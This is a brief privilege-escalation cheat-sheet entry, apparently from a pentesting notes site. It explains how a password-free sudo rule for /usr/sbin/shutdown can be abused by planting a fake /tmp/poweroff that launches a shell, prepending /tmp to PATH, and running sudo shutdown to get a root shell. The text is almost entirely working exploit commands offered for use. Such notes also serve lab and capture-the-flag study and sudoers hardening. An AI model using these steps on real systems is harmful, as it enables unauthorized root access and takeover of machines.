Sudo Shutdown, Poweroff Privilege Escalation
Last modified: 2023-02-05
Sudo shutdown command might be vulnerable to privilege escalation (PrivEsc).
Investigation
sudo -l
(ALL) NOPASS: /usr/sbin/shutdown
If we can execute "shutdown" command as root, we can gain access to privileges by overwriting the path of "poweroff".
Exploitation
First create /tmp/poweroff binary which invoke a shell.
echo /bin/sh > /tmp/poweroff
# or
echo /bin/bash > /tmp/poweroff
Then change permissions of the file and add "/tmp" folder to PATH.
chmod +x /tmp/poweroff
export PATH=/tmp:$PATH
Now execute "shutdown" as root.
# Some SUID command
sudo /usr/sbin/shutdown
# Then you are root user
root>
/tmp/poweroff is executed and spawn a root shell.